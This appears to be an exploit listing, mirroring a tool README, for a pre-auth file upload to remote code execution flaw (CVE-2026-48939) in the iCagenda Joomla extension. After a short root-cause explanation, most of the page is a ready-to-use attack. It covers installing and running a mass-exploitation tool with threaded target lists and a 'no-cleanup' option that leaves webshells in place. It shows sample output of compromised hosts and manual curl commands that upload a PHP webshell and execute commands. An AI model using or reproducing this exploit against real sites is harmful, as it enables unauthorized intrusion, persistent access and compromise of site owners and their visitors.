Share
## https://sploitus.com/exploit?id=14A3F05E-0527-55F9-A8F6-C46C7EEA7E2E
CVE-2026-48939 โ iCagenda Joomla RCE Exploit
Pre-Auth Arbitrary File Upload โ PHP Code Execution
---
## Overview
**CVE-2026-48939** is a CVSS 10.0 critical vulnerability in the iCagenda events calendar extension for Joomla. The frontend event registration form's file attachment feature enforces access controls only at the view layer โ not the controller โ allowing unauthenticated file upload with no extension validation.
Uploaded files land directly under the web root at `/images/icagenda/frontend/attachments/` and are immediately executable as PHP.
### Affected Versions
| iCagenda Version | Status |
|---|---|
| 3.2.1 โ 3.9.14 | Vulnerable |
| 4.0.0 โ 4.0.7 | Vulnerable |
| 3.9.15 / 4.0.8+ | Patched |
---
## Vulnerability Mechanism
### Root Cause
The `registration.submit` controller processes file uploads without enforcing the "Registered Only" access restriction configured in the component settings. File attachments are written with their original extension without any allowlist, MIME type, or content validation.
```
View Layer โ "Registered Only" enforced (attempts to block)
Controller โ No auth check whatsoever (trivially bypassed by POST)
File Handler โ No extension allowlist, no MIME check, no content scan
Destination โ Web-accessible directory โ PHP executes directly
```
### Attack Flow
```
POST /index.php?option=com_icagenda&task=registration.submit
jform[attachment] = shell.php โ saved to /images/icagenda/frontend/attachments/
GET /images/icagenda/frontend/attachments/shell_TIMESTAMP.php?cmd=id
โ PHP executed โ RCE
```
---
## Installation
```bash
git clone https://github.com/shinthink/CVE-2026-48939.git
cd CVE-2026-48939
pip install -r requirements.txt
```
---
## Usage
```bash
# Single target
python cve_2026_48939.py -t target.com
# Mass exploit
python cve_2026_48939.py -f targets.txt
# Persistent shell (no cleanup)
python cve_2026_48939.py -t target.com --no-cleanup
# Save results
python cve_2026_48939.py -f targets.txt -o rce.txt
```
### Arguments
```
-t, --target Single target (domain or IP)
-f, --file Target list, one per line
-o, --output Save RCE results to file
--threads Concurrent workers (default: 25)
--no-cleanup Leave shells on target
-v, --verbose Show detailed output
```
---
## Proof of Concept
### Exploitation
```bash
$ python cve_2026_48939.py -t target.com -v
```
```
CVE-2026-48939 โ iCagenda Joomla RCE Exploit
CVSS 10.0 | Pre-Auth | File Upload โ RCE
[+] POST registration.submit (jform[attachment]): HTTP 200
[+] Shell: https://target.com/images/icagenda/frontend/attachments/ic_a3f2b9c1.php
Host : target.com
iCagenda : YES v4.0.5
Vuln : YES
RCE : YES
Shell : https://target.com/images/icagenda/frontend/attachments/ic_a3f2b9c1.php
Output : uid=1001(www-data) gid=1001(www-data) groups=1001(www-data)
Time : 3.2s
```
### Mass Exploit Output
```
CVE-2026-48939 iCagenda RCE Exploit
Targets: 500 | Threads: 25 | Cleanup: ON
-------------------------------------------------------
[RCE] target-1.com v4.0.5 3.2s
uid=1001(www-data) gid=1001(www-data)
[RCE] target-2.com v3.9.12 4.1s
uid=33(www-data) gid=33(www-data)
-------------------------------------------------------
Total: 500 | iCagenda: 23 | RCE: 8
-------------------------------------------------------
```
### Manual Exploitation
**Step 1 โ Upload PHP webshell**
```bash
cat > shell.php
EOF
curl -sk -X POST \
-F "title=Event" \
-F "jform[attachment]=@shell.php;type=application/x-php" \
"https://target.com/index.php?option=com_icagenda&task=registration.submit"
```
**Step 2 โ Execute commands**
```bash
curl -sk "https://target.com/images/icagenda/frontend/attachments/shell_TIMESTAMP.php?c=id"
```
---
## Disclaimer
> **FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.**
>
> This software is intended for security professionals conducting authorized penetration tests, organizations auditing their own infrastructure, and researchers studying vulnerability exploitation.
>
> Unauthorized access to computer systems is illegal and may violate:
> - United States: Computer Fraud and Abuse Act (18 U.S.C. 1030)
> - Indonesia: UU ITE Pasal 30 & 46
> - European Union: Directive 2013/40/EU
> - United Kingdom: Computer Misuse Act 1990
>
> The authors assume no liability for misuse.
---
## References
| Resource | Link |
|---|---|
| IONIX Advisory | [ionix.io/threat-center/cve-2026-48939](https://www.ionix.io/threat-center/cve-2026-48939/) |
| NVD Entry | [CVE-2026-48939](https://nvd.nist.gov/vuln/detail/CVE-2026-48939) |
| iCagenda Changelog | [icagenda.com/docs](https://www.icagenda.com/docs/changelog/icagenda-4-0-9) |
---
This project is not affiliated with iCagenda or Joomlic.